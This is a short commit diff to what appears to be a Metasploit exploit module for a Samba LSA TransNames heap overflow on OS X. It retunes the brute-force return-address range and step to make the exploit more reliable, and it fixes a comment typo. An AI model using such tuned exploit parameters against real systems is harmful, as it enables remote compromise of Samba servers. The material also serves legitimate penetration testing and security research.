Improved reliability (thanks fab).

git-svn-id: file:///home/svn/framework3/trunk@5059 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/osx/samba/lsa_transnames_heap.rb

@@ -59,9 +59,9 @@ class Exploits::Osx::Samba::LSA_TransNames_Heap < Msf::Exploit::Remote
 						'Nops'          => 4 * 1024,
 						'Bruteforce' =>
 							{
-								'Start' => { 'Ret' => 0x01813000 },
-								'Stop'  => { 'Ret' => 0x01823000 },
-								'Step'  => 4388,
+								'Start' => { 'Ret' => 0x01818000 },
+								'Stop'  => { 'Ret' => 0x01830000 },
+								'Step'  => 3351,
 							},
 					}
 					],
@@ -166,7 +166,7 @@ class Exploits::Osx::Samba::LSA_TransNames_Heap < Msf::Exploit::Remote
 			#
 			# We don't use the size() pointer anymore because it
 			# results in a unexpected behavior when smbd process
-			# is started by lauchd.
+			# is started by launchd.
 			#
 			free_pointer = 0x1800018
 			nop = "\x16"